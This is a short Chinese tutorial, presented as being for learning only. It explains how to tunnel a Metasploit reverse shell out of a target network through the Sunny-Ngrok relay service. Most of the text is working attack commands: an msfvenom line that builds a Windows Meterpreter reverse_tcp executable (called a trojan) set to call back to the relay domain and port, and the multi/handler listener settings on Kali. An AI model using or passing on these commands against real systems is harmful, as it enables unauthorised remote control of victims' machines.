免责声明:本文仅做技术交流与学习...
目录
Ngrok:
技术实现:
前提:
命令:
详细流程及图解:
平台Ngrok:
Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理
--隧道开通免费的
--协议选的要与后门一样
--本地端口写kali的
--客户端下载kali的...2米
技术实现:
1-内网打内网(穿透)
2-绕过目标内网协议实现本地上线(隧道)
前提:
中间有跳板.(外网服务器)(此可以与内网的通讯)
命令:
kali执行命令:
./sunny clientid 133328291918 //控制端连接 Ngrok 的服务器
kali生成后门配置监听:
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe
(协议与隧道对应) (远程域名) (远程端口)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
(本地端口)
run
详细流程及图解:
通过第三者跳板机先建立与D1的隧道.(域名 指向 kali的IP:PORT)
生成的马子绑定隧道的域名和PORT(当马子运行时就会解析到所指向的地址.)
--kali端连接 Ngrok 的服务器 ,生成马子.